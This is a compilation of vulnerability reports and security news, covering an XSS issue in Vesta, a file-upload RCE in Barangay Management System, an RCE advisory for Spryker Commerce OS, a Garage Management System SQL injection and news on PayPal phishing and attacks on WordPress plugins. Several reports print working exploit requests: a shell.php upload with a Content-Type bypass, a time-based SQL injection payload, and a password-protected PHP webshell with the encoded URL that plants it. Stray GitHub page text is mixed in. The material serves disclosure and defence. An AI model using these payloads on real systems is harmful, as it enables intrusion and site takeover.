Vesta v1.0.0-5 was discovered to contain a cross-site scripting (XSS) vulnerability via the body function at /web/api/v1/upload/UploadHandler.php.

Hello,

I would like to report for possible XSS vulnerability.

In file https://github.com/serghey-rodin/vesta/blob/master/web/api/v1/upload/UploadHandler.php

the source in function post

    public function post($print\_response = true) {
        //....
        // the source $\_FILES\[$this->options\['param\_name'\]\]
        $upload = isset($\_FILES\[$this\->options\['param\_name'\]\]) ? $\_FILES\[$this\->options\['param\_name'\]\] : null;
        // ....
        foreach ($upload\['tmp\_name'\] as $index => $value) {
            // $files will have the source which return from handle\_file\_upload
            $files\[\] = $this\->handle\_file\_upload(
                $upload\['tmp\_name'\]\[$index\],
                $file\_name ? $file\_name : $upload\['name'\]\[$index\],
                $size ? $size : $upload\['size'\]\[$index\],
                $upload\['type'\]\[$index\], // The source
                $upload\['error'\]\[$index\],
                $index,
                $content\_range
            );
        }
        //.....
        // call generate\_response and pass the source in the array in $files
        return $this\->generate\_response(
            array($this\->options\['param\_name'\] => $files),
            $print\_response
        );
    }

function handle\_file\_upload

    protected function handle\_file\_upload($uploaded\_file, $name, $size, $type, $error,
        //.....
        // the source in $file->type
        $file\->type = $type;
        //....
        return $file;
    }

function generate\_response

    protected function generate\_response($content, $print\_response = true) {
        if ($print\_response) {
            $json = json\_encode($content);
            //.....
            $this\->body($json);
        }
    }

Finally, the sink in function body

protected function body($str) {
        // the sink
        echo $str;
    }

CVE-2022-36305: Possible XSS Vulnerability · Issue #2252 · serghey-rodin/vesta

Barangay Management System v1.0 was discovered to contain an arbitrary file upload vulnerability via the resident module editing function at /bmis/pages/resident/resident.php.

Permalink

Cannot retrieve contributors at this time

**Barangay Management System v1.0 by itsourcecode.com has arbitrary code execution (RCE)**

The decompression password for the source file is itsourcecode.

Login account: admin/admin (Super Admin account)

Vulnerability url: ip/bmis/pages/resident/resident.php

vendors: https://itsourcecode.com/free-projects/php-project/barangay-management-system-project-in-php-with-source-code/

Loophole location: Background management system Resident module editing function-> resident.php file picture upload point exists arbitrary file upload vulnerability (RCE).

Click "Save" to save

> Content-Type: image/jpeg //Key points (Bypass detection by changing "Content Type" to "Content-Type: image/jpeg")

Request package for file upload：

POST /bmis/pages/resident/resident.php HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.1.19/bmis/pages/resident/resident.php
Cookie: sessions=aj0k5o11d743ingah9kp1b0ejntrqer6; PHPSESSID=fbu82ocu8kd37b5b20uqq71a35; \_ga=GA1.1.1382961971.1655097107; \_gid=GA1.1.804632123.1655097107
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------197262279020245
Content-Length: 4420
\-----------------------------197262279020245
Content-Disposition: form-data; name="hidden\_id"
1
\-----------------------------197262279020245
Content-Disposition: form-data; name="txt\_edit\_lname"
Suares
\-----------------------------197262279020245
Content-Disposition: form-data; name="txt\_edit\_fname"
Jude
\-----------------------------197262279020245
Content-Disposition: form-data; name="txt\_edit\_mname"
Reyes
\-----------------------------197262279020245
Content-Disposition: form-data; name="txt\_edit\_bdate"
2021-10-12
\-----------------------------197262279020245
Content-Disposition: form-data; name="txt\_edit\_brgy"
Brgy.Tan-awan
\-----------------------------197262279020245
Content-Disposition: form-data; name="txt\_edit\_householdnum"
1
\-----------------------------197262279020245
Content-Disposition: form-data; name="txt\_edit\_dperson"
yes
\-----------------------------197262279020245
Content-Disposition: form-data; name="txt\_edit\_btype"
0+
\-----------------------------197262279020245
Content-Disposition: form-data; name="txt\_edit\_cstatus"
Single
\-----------------------------197262279020245
Content-Disposition: form-data; name="txt\_edit\_length"
5
\-----------------------------197262279020245
Content-Disposition: form-data; name="txt\_edit\_national"
Filipino
\-----------------------------197262279020245
Content-Disposition: form-data; name="txt\_edit\_igpit"
1122
\-----------------------------197262279020245
Content-Disposition: form-data; name="ddl\_edit\_eattain"
Doctorate degree
\-----------------------------197262279020245
Content-Disposition: form-data; name="ddl\_edit\_los"
Care Taker
\-----------------------------197262279020245
Content-Disposition: form-data; name="txt\_edit\_water"
Deep Well
\-----------------------------197262279020245
Content-Disposition: form-data; name="txt\_edit\_toilet"
Water-sealed
\-----------------------------197262279020245
Content-Disposition: form-data; name="txt\_edit\_remarks"
None
\-----------------------------197262279020245
Content-Disposition: form-data; name="txt\_edit\_uname"
jude
\-----------------------------197262279020245
Content-Disposition: form-data; name="ddl\_edit\_gender"
Male
\-----------------------------197262279020245
Content-Disposition: form-data; name="txt\_edit\_bplace"
Brgy. Mambato, Himamaylan City
\-----------------------------197262279020245
Content-Disposition: form-data; name="txt\_edit\_mstatus"
single
\-----------------------------197262279020245
Content-Disposition: form-data; name="txt\_edit\_zone"
1
\-----------------------------197262279020245
Content-Disposition: form-data; name="txt\_edit\_householdmem"
10
\-----------------------------197262279020245
Content-Disposition: form-data; name="txt\_edit\_rthead"
Brother
\-----------------------------197262279020245
Content-Disposition: form-data; name="txt\_edit\_occp"
Programmer
\-----------------------------197262279020245
Content-Disposition: form-data; name="txt\_edit\_income"
300000
\-----------------------------197262279020245
Content-Disposition: form-data; name="txt\_edit\_religion"
Catholic
\-----------------------------197262279020245
Content-Disposition: form-data; name="txt\_edit\_skills"
Programming
\-----------------------------197262279020245
Content-Disposition: form-data; name="txt\_edit\_phno"
2147483647
\-----------------------------197262279020245
Content-Disposition: form-data; name="ddl\_edit\_hos"
Live with Parents/Relatives
\-----------------------------197262279020245
Content-Disposition: form-data; name="ddl\_edit\_dtype"
2nd Option
\-----------------------------197262279020245
Content-Disposition: form-data; name="txt\_edit\_lightning"
2147483647
\-----------------------------197262279020245
Content-Disposition: form-data; name="txt\_edit\_faddress"
brgy. enlcaro
\-----------------------------197262279020245
Content-Disposition: form-data; name="txt\_edit\_upass"
jude123
\-----------------------------197262279020245
Content-Disposition: form-data; name="txt\_edit\_image"; filename="shell.php"
Content-Type: image/jpeg //Key points
JFJF
<?php phpinfo();?>
\-----------------------------197262279020245
Content-Disposition: form-data; name="btn\_save"
Save
\-----------------------------197262279020245
Content-Disposition: form-data; name="table\_length"
10
\-----------------------------197262279020245--

The files will be uploaded to this directory \\bmis\\pages\\resident\\image  

We visited the directory of the file in the browser and found that the code had been executed

CVE-2022-34024: bug_report/RCE-1.md at main · sorabug/bug_report

Barangay Management System v1.0 was discovered to contain a SQL injection vulnerability via the hidden_id parameter at /officials/officials.php.

**Blazing fast cloud developer environments with Codespaces**Learn more about GitHub Codespaces

**The future of code is in the cloud, not your local copy. Codespaces gives you a complete, configurable dev environment on top of a powerful VM in minutes.**

**Visual Studio Code, in your browser, full stop. Codespaces brings the world’s most popular desktop editor to every repo. Code, build, test, use the terminal, and open pull requests from anywhere.**

**Customize to your heart’s desire. Add your favorite VS Code extensions, create a devcontainer config file, install new themes, and tweak your settings.**

**GitHub Copilot,  
your AI code companion****GitHub Copilot plugs directly into your editor and suggests lines of code—and entire functions. Focus on building bigger things while GitHub Copilot takes on the repetitive stuff.**Learn more about GitHub Copilot

1

2

3

4

5

6

7

8

9

10

11

12

13

14

const token \= process.env\["TWITTER\_BEARER\_TOKEN"\]

const fetchTweetsFromUser \= async (screenName, count) \=> {

  const response \= await fetch(

    \`https://api.twitter.com/1.1/statuses/user\_timeline.json?screen\_name=${screenName}&count=${count}\`,

    {

      headers: {

        Authorization: \`Bearer ${token}\`,

      },

    }

  )

  const json \= await response.json()

  return json

}

CVE-2022-34023: GitHub: Where the world builds software

Spryker Commerce OS with spryker/http module versions prior to 1.7.0 suffer from a remote command execution vulnerability due to a predictable value in use.

Title  
=====

SCHUTZWERK-SA-2022-003: Remote Command Execution in Spryker Commerce OS

Status  
======

PUBLISHED

Version  
=======

1.0

CVE reference  
=============

CVE-2022-28888

Link  
====

https://www.schutzwerk.com/en/43/advisories/schutzwerk-sa-2022-003/

Text-only version:  
https://www.schutzwerk.com/advisories/SCHUTZWERK-SA-2022-003.txt

Affected products/vendor  
========================

Spryker Commerce OS by Spryker Systems GmbH, with spryker/http module <   
1.7.0

Summary  
=======

A predictable value is used to sign and verify special _fragment URLs in  
Spryker Commerce OS with spryker/http module < 1.7.0. Attackers that can   
guess  
this value are able to generate valid _fragment URLs which allow calling PHP  
methods, with certain restrictions. It could be demonstrated that this   
allows  
attackers to write arbitrary content to files on the file system, which, in  
turn, allows for execution of arbitrary PHP commands in many setups and  
therefore remote command execution.

Risk  
====

The vulnerability allows attackers to execute arbitrary commands on an  
operating system-level on systems where the Spryker Commerce OS is   
installed.  
In many cases, authentication is not necessary for successful   
exploitation. If  
attackers have already determined that Spryker Commerce OS is utilized   
through  
fingerprinting, checking for the presence of the vulnerability is   
trivial. With  
the ability to execute arbitrary commands, attacks can, for example, access  
customer data of the affected shop.

Description  
===========

A webshop that was recently assessed for security vulnerabilities by   
SCHUTZWERK  
was found to contain a remote command execution vulnerability. The   
application  
in scope is based on a framework by Spryker -- Spryker Commerce OS.   
Spryker's  
framework, in turn, is based on Symfony[0] and/or Silex[1].

Symfony and Silex both support a special _fragment endpoint. This   
feature was  
analyzed by Ambionics Security[2] in 2020. In their write up, the feature is  
described as follows:

   One of Symfony's built-in features, made to handle ESI (Edge-Side  
   Includes)[3], is the FragmentListener class[4]. Essentially, when someone  
   issues a request to /_fragment, this listener sets request attributes   
from  
   given GET parameters. Since this allows to run arbitrary PHP code [...],  
   the request has to be signed using a HMAC value. [...]

   [...] Given its importance, [the secret used for signing] must   
obviously be  
   very random.

At least parts of the source code of the Spryker framework are open   
source and  
publicly accessible via GitHub. During the assessment, while certain  
security-sensitive parts of the source code were reviewed, it was discovered  
that the secret used to sign and verify _fragment URLs is static and  
predictable. The secret is set to md5(__DIR__) in the PHP file  
HttpFragmentServiceProvider.php[5] and in two different HttpConfig.php[6][7]  
files.

__DIR__ is a built-in "magic constant" in PHP[8] and it corresponds to "the  
directory of the file". It is not entirely clear, which of these PHP   
files is  
actually included and loaded by the Spryker framework. However, it is   
assumed  
that the file http/src/Spryker/Shared/Http/HttpConfig.php is the culprit.

Guessing the secret  
^^^^^^^^^^^^^^^^^^^

In order to gain a better understanding of the vulnerability, SCHUTZWERK   
set up  
a local Spryker development instance with a demo shop[9] in order to   
allow for  
more in-depth debugging.

By inspecting the source code and adding appropriate debug statements, the  
secret was identified as e3ae11e53f7c3d72da08784b9af763f9. This   
corresponds to  
the MD5 sum of the path  
/data/shop/development/current/vendor/spryker/http/src/Spryker/Shared/Http:

$ echo -n '/data/shop/development/current/vendor/spryker/http/src/Spryker/'\  
'Shared/Http'| md5sum  
e3ae11e53f7c3d72da08784b9af763f9  -

The proof-of-concept script find_secret.py[10] was developed in order to  
automate the process of identifying the secret based on a list of known   
Spryker  
paths. The script was executed as follows against the local development  
instance and correctly identified the static secret:

$ python3 find_secret.py --path-list known_spryker_paths.txt \  
http://www.de.b2b-demo-shop.local/_fragment  
[-] http://www.de.b2b-demo-shop.local/_fragment   
2c03fc8fac1ff5204b56d4dbf879a3fc  
[-] http://www.de.b2b-demo-shop.local/_fragment   
f71e9665ffe0a0e3b54bbe7c2642d466  
[-] http://www.de.b2b-demo-shop.local/_fragment   
faf0d063ad6adf3776d59bc55a17aa5f  
[+] http://www.de.b2b-demo-shop.local/_fragment   
e3ae11e53f7c3d72da08784b9af763f9

 (/data/shop/development/current/vendor/spryker/http/src/Spryker/Shared/Http)

This verification step does not require authentication in the default  
configuration. The script generates _fragment URLs based on a provided   
list of  
paths and detects whether the server views these URLs as valid (correctly  
signed) or not. This distinction is made based on different observations   
(e.g.  
status code, response content, etc.).

The same script was then executed against the customer's instance:

$ python3 find_secret.py --path-list known_spryker_paths.txt \  
[CUSTOMER_DOMAIN]/_fragment  
[-] [CUSTOMER_DOMAIN]/_fragment e3ae11e53f7c3d72da08784b9af763f9  
[-] [CUSTOMER_DOMAIN]/_fragment faf0d063ad6adf3776d59bc55a17aa5f  
[-] [CUSTOMER_DOMAIN]/_fragment 8399015c0dbbf2162983fb7ad0ea6a9a  
[-] [CUSTOMER_DOMAIN]/_fragment 8baff412797b1ddd80cd968e7446aa06  
[...]  
[-] [CUSTOMER_DOMAIN]/_fragment 2c03fc8fac1ff5204b56d4dbf879a3fc  
[-] [CUSTOMER_DOMAIN]/_fragment d6de8df0b4ad55b15f198e06142dd0e6  
[-] [CUSTOMER_DOMAIN]/_fragment d6de8df0b4ad55b15f198e06142dd0e6  
[+] [CUSTOMER_DOMAIN]/_fragment 9c15f40d8e5610e89caf6f9b7a97be3b  
     (/data/srv/yves/www/vendor/spryker/http/src/Spryker/Shared/Http)

In this case, the identified secret 9c15f40d8e5610e89caf6f9b7a97be3b  
corresponds to the path  
/data/srv/yves/www/vendor/spryker/http/src/Spryker/Shared/Http.

The installation path of the application can of course vary greatly between  
installations. However, if customers use the official Docker guide   
provided by  
Spryker, it is likely that they will use the paths utilized in the   
examples and  
thus share a common installation path.

Even if this is not the case, customers might share installation paths   
between  
multiple environments (development, production). A compromise of one  
installation would therefore make a compromise of the other installations  
likely.

Signing URLs  
^^^^^^^^^^^^

In addition to the secret, a URL must be passed to the HMAC function to form  
the signature. However, in both instances of the vulnerability that were  
discovered during the assessment, the URL was the same as the external URL.  
This might be true for all Commerce OS installations.

With a valid secret and a URL, it is now possible to sign URLs. As shown   
in the  
write up of Ambionics Security, it is generally possible to execute   
arbitrary  
commands using different methods (direct reference of a PHP class/method or  
deserialization of PHP objects). However, both approaches did not work,   
likely  
due to code changes made by Spryker to Symfony/Silex.

Generally, the correct syntax for _fragment URLs is the following:

<protocol>://<domain>/_fragment?_path=_controller=<controller   
specification>&  
_hash=<valid URL signature>

Through further analysis, an alternative approach was discovered.   
Replacing the  
value of the URL parameter _path in the listing above allows to specify PHP  
classes with certain limitations (decoded and reformatted for increased  
readability):

_controller[]=Path\To\Class&  
_controller[]=nameOfMethod&  
arg1=value

At least the following limitations apply:

*  Class must have no initialize function or, alternatively, an initialize  
function without arguments  
*  Class must have an constructor without arguments

While examining the source code for possible candidates, the Symfony class  
Filesystem was discovered. This class meets the limitations and allows   
writing  
arbitrary content to a specified file path. The following payload was   
created  
(decoded and reformatted for increased readability):

_controller[]=Symfony\Component\Filesystem\Filesystem&  
_controller[]=appendToFile&  
filename=SCHUTZWERK.php&  
content=TEST

The generated URL is as follows:

http://www.de.b2b-demo-shop.local/_fragment?_path=_controller%255B%255D%3DSymfony%255C  
Component%255CFilesystem%255CFilesystem%26_controller%255B%255D%3DappendToFile%26  
filename%3D%252Ftmp%252Fschutzwerk.php%26content%3DTEST&  
_hash=8Phw5nGDW%2FDgLe%2Fvpep0Exzz%2BIsptnd%2FyOb4G5CT12U%3D

After execution, the content is written to the file:

vagrant@vm-b2b-demo-shop / $ cat /tmp/schutzwerk.php  
TEST

With this primitive in place, it is possible to execute arbitrary PHP   
code and  
subsequently commands on an operating system level. To demonstrate this, the  
following PHP code for a minimal webshell was appended to the file  
/data/shop/development/current/public/Yves/maintenance/maintenance.php   
in the  
development instance:

if(isset($_GET['pass'])){  
   if($_GET['pass']=="yunn@swervIfUf3"){  
     if(isset($_REQUEST['cmd'])){  
       echo "<pre>";  
       $cmd=($_REQUEST['cmd']);  
       system($cmd);  
       echo "</pre>";  
       die;  
     }  
   }  
}

The generated URL is as follows:

http://www.de.b2b-demo-shop.local/_fragment?_path=_controller%255B%255D%3DSymfony%255C  
Component%255CFilesystem%255CFilesystem%26_controller%255B%255D%3DappendToFile%26  
filename%3D%252Fdata%252Fshop%252Fdevelopment%252Fcurrent%252Fpublic%252FYves%252F  
maintenance%252Fmaintenance.php%26content%3Dif%2528isset%2528%2524_GET%255B%2527pass  
%2527%255D%2529%2529%257B%250A%2B%2Bif%2528%2524_GET%255B%2527pass%2527%255D%253D%25  
3D%2522yunn@swervIfUf3%2522%2529%257B%250A%2B%2B%2B%2Bif%2528isset%2528%2524  
_REQUEST%255B%2527cmd%2527%255D%2529%2529%257B%250A%2B%2B%2B%2B%2B%2Becho%2B%2522%253Cpre  
%253E%2522%253B%250A%2B%2B%2B%2B%2B%2B%2524cmd%253D%2528%2524_REQUEST%255B%2527cmd%2527  
%255D%2529%253B%250A%2B%2B%2B%2B%2B%2Bsystem%2528%2524cmd%2529%253B%250A%2B%2B%2B%2B%2B  
%2Becho%2B%2522%253C%252Fpre%253E%2522%253B%250A%2B%2B%2B%2B%2B%2Bdie%253B%250A%2B%2B%2B  
%2B%257D%250A%2B%2B%257D%250A%257D&_hash=XAnTzw2Y6hhbyIwO7KQ9qdTHrFMQ%2BUKWrVqRCad6JHE%3D

Afterwards, the file contains the following content:

<?php  
[...]  
if (file_exists(__DIR__ . '/maintenance.marker')) {  
   http_response_code(503);  
   echo file_get_contents(__DIR__ . '/index.html');  
   exit(0);  
}  
if(isset($_GET['pass'])){  
if($_GET['pass']=="yunn@swervIfUf3"){  
   if(isset($_REQUEST['cmd'])){  
     echo "<pre>";  
     $cmd=($_REQUEST['cmd']);  
     system($cmd);  
     echo "</pre>";  
     die;  
   }  
}  
}

Since the PHP file maintenance.php is consulted for every request, the   
injected  
PHP webshell code can be executed using URLs similar to the following:

http://www.de.b2b-demo-shop.local/?pass=yunn@swervIfUf3&cmd=id

Solution/Mitigation  
===================

1. Update spryker/http module to version 1.7.0  
2. Configure SPRYKER_ZED_REQUEST_TOKEN environment variable with a long,   
random  
and secure string

Disclosure timeline  
===================

2022-04-07: Vulnerability discovered  
2022-04-07: Initial contact with vendor  
2022-04-08: Vulnerability reported to vendor  
2022-04-08: CVE-2022-28888 assigned by MITRE  
2022-04-11: Vendor notifies customers about vulnerability, releases patch  
2022-04-26: Requested update from vendor  
2022-05-05: Requested update from vendor  
2022-06-20: Notified vendor of intention to publish advisory on 20220-06-30  
2022-06-22: Vendor confirms that customers were notified about the   
vulnerability  
2022-07-12: Advisory published by SCHUTZWERK

Contact/Credits  
===============

The vulnerability was discovered during an assessment by David Brown and  
Marcelo Reyes of SCHUTZWERK GmbH.

References  
==========

[0] https://symfony.com  
[1] https://github.com/silexphp/Silex  
[2] https://www.ambionics.io/blog/symfony-secret-fragment  
[3] https://en.wikipedia.org/wiki/Edge_Side_Includes  
[4]   
https://github.com/symfony/symfony/blob/ac236517cc8925110d2ec9c35cfdb682a7b82f06/src/Symfony/Component/HttpKernel/EventListener/FragmentListener.php  
[5]   
https://github.com/spryker/silexphp/blob/94d2afc9b1ed9662193985cad1ba47da33bdc80d/src/Silex/Provider/HttpFragmentServiceProvider.php#L75  
[6]   
https://github.com/spryker/http/blob/56313eaff6594821849846d1b93e0b7eba9a09b6/src/Spryker/Shared/Http/HttpConfig.php#L29  
[7]   
https://github.com/spryker/spryker-core/blob/88ab823143b5521b4e1bb1b930321ec39eb4ec1e/Bundles/Http/src/Spryker/Shared/Http/HttpConfig.php#L29  
[8] https://www.php.net/manual/en/language.constants.magic.php  
[9]   
https://docs.spryker.com/docs/scos/dev/setup/installing-spryker-with-development-virtual-machine/installing-spryker-with-devvm-on-macos-and-linux.html  
[10] https://www.schutzwerk.com/en/43/assets/advisories/find_secret.py

Disclaimer  
==========

The information provided in this security advisory is provided "as is" and  
without warranty of any kind. Details of this security advisory may be   
updated  
in order to provide as accurate information as possible. The most recent  
version of this security advisory can be found at SCHUTZWERK GmbH's website  
( https://www.schutzwerk.com ).

--   
SCHUTZWERK GmbH, Pfarrer-Weiß-Weg 12, 89077 Ulm, Germany

Phone +49 731 977 191 0  
Fax +49 731 977 191 99  
Mobile +49 171 337 2701

advisories@schutzwerk.com / www.schutzwerk.com

Geschäftsführer / Managing Directors:  
Jakob Pietzka, Michael Schäfer

Amtsgericht Ulm /  HRB 727391

Spryker Commerce OS Remote Command Execution

Scammers have created a PayPal phishing campaign that extensively asks for sensitive information, including government IDs and headshot photos.
The post PayPal phishing campaign goes after more than just your login credentials appeared first on Malwarebytes Labs.

A new phishing campaign targeting PayPal users aims to get extensive data from potential victims. The data it’s after includes government documents like passport, as well as selfie photos. In a nutshell, it’s an extensive form of information theft, the likes of which could result in someone’s identity being fully stolen and their financial and other online accounts being taken over.

PayPal phishing sites are a dime a dozen due to the number of people and companies using it as another form of payment method. However, what’s notable about this campaign is that all the phishing pages are hosted on legitimate WordPress sites.

Hundreds—if not thousands—of WordPress sites remain vulnerable and easily exploited by scammers because of their poor security and the use of weak passwords. This was evident after Akamai found an attacker had planted a phishing kit on its WordPress honeypot.

After successfully brute-forcing their way into the WordPress site using a list of common credentials, the attackers then installed a file manager plugin that let them upload the phishing kit to the compromised site.

To avoid detection, the phishing kit cross-referenced IP addresses to domains belonging to companies it wants to avoid. Naturally, some of these domains include those belonging to cybersecurity organizations.

**Blending into the background**

Akamai researchers also noticed how the scammers made an effort to make their phishing page as indistinguishable as possible from the legitimate one. For one thing, the actors used _.htaccess_ (short for hypertext access), a file that allows an admin to modify how a URL destination appears on the address bar.

In this case, the scammers wanted their phishing URL to make it look like it wasn’t a PHP file, so they edited out the “.php” bit of the URL. This makes sense because PayPal’s sign-in page doesn’t have an extension.

Oddly enough, the phish starts off asking users to type in the alphanumeric string they see on the “Security Challenge” page, under the guise of a means to verify that the user isn’t a bot.

This fake PayPal page asks you to enter what you see into a text box.  
(Source: Akamai)

The next page then asks for the user’s PayPal credentials. Normally, phishing kits would stop here, and the scammers would leave content with the PayPal credentials they can then misuse and abuse.

But not here. In this case they want more. This is just the start of a sophisticated work-up to get users to provide such sensitive information without them realizing it.

After users provide their PayPal credentials, they are then presented with a notice of “unusual activity” in the next screen.

(Source: Akamai)

Once users click the “Secure My Account” button, they are then directed to a page telling them to confirm all their card details. Here, Akamai noted that a ZIP code and CVV are normally sufficient.

(Source: Akamai)

Next, the scammers then ask users for yet more information, specifically their ATM PIN, social security number (SSN), and their mother’s maiden name—a bit of detail that could bypass an additional security layer for an account.

(Source: Akamai)

The PayPal phishing site then encourages users to link an email address to their PayPal account, giving the attackers a token, and therefore access, to that email account. It also encourages victims to upload official government documents, such as a passport, driver’s license, or national ID, to secure the account.

> Uploading government documents and taking a selfie to verify them is a bigger ballgame for a victim than just losing credit card information — it could be used to create cryptocurrency trading accounts under the victim’s name. These could then be used to launder money, evade taxes, or provide anonymity for other cybercrimes. 
> 
> ~ Akamai Security Research, Akamai

For a verification process for an account showing unusual activity, the amount of information being asked from users is ridiculous and overkill. However, Akamai researchers believe that socially engineering PayPal users to let them keep giving away their data is what makes this phishing kit successful.

“People judge brands and companies on their security measures these days,” said Akamai in the report. “Not only is it commonplace to verify your identity in a multitude of ways, but it’s also an expectation when logging in to sites with ultrasensitive information, such as financial or healthcare companies.”

Phishing, in general, has come a long way. Attackers have been learning from their mistakes thanks to our growing understanding of their tactics and social engineering techniques.

As users of online services, we, too, have an obligation over our own online security and privacy. And the only way one can tell apart two seemingly identical websites is to look at your browser’s address bar.

To rephrase a line: to err is human, to scrutinize URLs is divine.

Stay safe!

PayPal phishing campaign goes after more than just your login credentials

We take a look at a WordPress plugin, abandoned and open to JavaScript related exploitation. Uninstall it now!
The post Warning for WordPress admins: uninstall the Modern WPBakery plugin immediately! appeared first on Malwarebytes Labs.

WordPress admins are being warned to remove a buggy plugin or risk a total site takeover.

This particular threat relates to a plugin which is no longer in use: Modern WPBakery page builder addons. The vulnerability in the plugin, known as CVE-2021-24284, allows “unauthenticated arbitrary file upload via the ‘uploadFontIcon’ AJAX action”. This means that attackers could upload rogue PHP files to the WordPress site, leading to remote code execution and a complete site takeover.

There’s been a sudden increase in attacks related to this abandoned WordPress relic. In 2021, researchers discovered “several vulnerable endpoints” which could lead to injection of malicious JavaScript or even deletion of arbitrary files in Modern WPBakery. This time around, the aim of the game is to once again upload rogue PHP files then inject malicious JavaScript into the site.

Roughly 1.6 million sites have been scanned to check for the plugin’s presence by bad actors, and current estimates suggest somewhere in the region of 4,000 to 8,000 websites are still playing host to the plugin.

**Check and remove ASAP**

The current advice is to check for the plugin, and then remove it as soon as you possibly can. It’s been completely abandoned, and no security-related fixes will be forthcoming.

If you have it installed, you’re on your own, and it’s likely only a matter of time before the exploiters make their way to your Modern WPBakery hosting website and start getting up to mischief.

Do yourself and your site visitors a favour: Remove this outdated invitation to site-wide compromise as soon as you possibly can.

Warning for WordPress admins: uninstall the Modern WPBakery plugin immediately!

Silence of the LAM

An unauthenticated arbitrary object instantiation vulnerability in LDAP Account Manager (LAM) has been discovered during an internal penetration test.

LAM is a PHP web application for managing entries such as users, groups, or DHCP settings in LDAP directories via a user-friendly web front end, and is one of the alternatives to FreeIPA. Its included in Debian repositories.

But a vulnerability discovered by researcher Arseniy Sharoglazov could allow an attacker to create arbitrary objects and achieve remote code execution (RCE) in one request, and without any out-of-band connections.

**Under construction**

The technique depends on exploiting the construction , with the variable standing for the class name that the object will be created for, and the variable standing for the first argument that will be passed to the object’s constructor.

“When you code in any programming language, you can use good or bad programming practices. The usage of the construction new , which instantiates arbitrary objects, is a bad practice, if and come from a non-controlled input,” Sharoglazov tells _The Daily Swig_.

"It’s a dodgy construction. However, no one showed that it’s really dangerous, so some people think that everything should be alright.”

While the technique requires the Imagick extension, he says, this is usually present in larger websites, including the LAM system itself.

Read more of the latest infosec research news

Sharoglazov says that similar arbitrary object instantiation vulnerabilities have been around for quite some time, but aren’t usually reported as such.

“For example, you might read about an SSRF in a commercial software. If you knew the PoC, you would see that it’s actually an arbitrary object instantiation with the usage of the SoapClient class, for instance. But for the public it will be just SSRF,” he says.

“Or you might read about an SQL injection. But it’s actually an arbitrary object instantiation exploited via a user-defined class which has an SQL injection. This technique, which I found and described, shows how to exploit an arbitrary object instantiation directly to RCE.”

**Coordinated disclosure**

Sharoglazov says the disclosure process went quickly and efficiently. He first reported the flaw on 16 June, with LAM 8.0.1 released on June 29, Debian packages updated on July 5 and public disclosure on July 14.

“I wrote to Roland Gruber, the developer of LAM, and I got an initial reply in just one hour,” he says.

“We discussed what needs to be done to fix the vulnerabilities, and the hardening process that will make LAM way more secure. Afterwards, we did a coordinated disclosure with him and Debian.”

**RECOMMENDED** Microsoft Teams security vulnerability left users open to XSS via flawed stickers feature

LDAP Account Manager bug poses unauthenticated remote code execution risk

A vulnerability has been found in SourceCodester Garage Management System 1.0 and classified as critical. This vulnerability affects unknown code of the file /login.php. The manipulation of the argument username with the input 1@a.com' AND (SELECT 6427 FROM (SELECT(SLEEP(5)))LwLu) AND 'hsvT'='hsvT leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.

Permalink

**Exploit Title: Garage Management System - Multiple SQL injections****Date: 2022-07/19****Exploit Author: xiahao@webray.com.cn****Vendor Homepage: https://www.sourcecodester.com****Software Link: https://www.sourcecodester.com/php/15485/garage-management-system-using-phpmysql-source-code.htm****Version: 1.0****Tested on: windows10 + phpstudy****1.CVE-2022-2467**

/login.php SQL injection exists at the login port

**Sample request POC #1**

    POST /login.php HTTP/1.1
    Host: [TARGET URL/IP]
    Content-Length: 41
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: http://shen-ji.com
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://shen-ji.com/login.php
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: PHPSESSID=coj91b4jkkol1s8oalg3r7in12
    Connection: close
    
    username=1@a.com' AND (SELECT 6427 FROM (SELECT(SLEEP(5)))LwLu) AND 'hsvT'='hsvT&password=412312&login=
    

**Sqlmap running results**

**2./editbrand.php**

/editbrand.php SQL injection exists for parameter ID

**Sample request POC #2**

    http://[ip:port]/editbrand.php?id=1
    

**Sqlmap running results**

CVE-2022-2467: CVEproject/Garage-Management-System.md at main · xiahao90/CVEproject

An ongoing campaign is actively targeting the vulnerability in the Kaswara Modern WPBakery Page Builder Addon, which is still installed on up to 8,000 sites, security analysts warn.

Although the plug-in is no longer available, the Kaswara Modern WPBakery Page Builder Addons is still running on as many as 8,000 WordPress sites, according to analysts who warn the app's unpatched file upload vulnerability is under active attack. 

The WordPress bug, tracked under CVE-2021-24284, can be used to upload malicious PHP files to an affected website, according to the research team at Wordfence. The vulnerability could lead to code execution and complete site takeover, the researchers warn. The plug-in was closed without a patch and the Wordfence team says all versions are affected by the bug.

Wordfence raised the alarm that it has seen nearly a half-million daily attacks since the beginning of July. The campaign has used the NDSW Trojan to inject code into legitimate JavaScript files and redirect users to malicious domains.

The team stresses this is a "serious vulnerability that can lead to complete site takeover" and that the "developer has not been responsive regarding the patch" in their advisory on the WordPress plug-in. Since it is unlikely the plug-in will ever receive a patch for this critical vulnerability, "the best option is to fully remove the Kaswara Modern WPBakery Page Builder Addons plugin from your WordPress website," the researchers advise. 

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

WordPress Page Builder Plug-in  Under Attack, Can't Be Patched

The AnyMind Widget plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including 1.1. This is due to missing nonce protection on the createDOMStructure() function found in the ~/anymind-widget-id.php file. This makes it possible for unauthenticated attackers to inject malicious web scripts into the page, granted they can trick a site’s administrator into performing an action such as clicking on a link.

Last change on this file was 1978853, checked in by , 4 years ago

Add widgetId field  

**File size:** 950 bytes

Line

 

1

2

<?php

3

  createDOMStructure();

4

5

$widgetId;

6

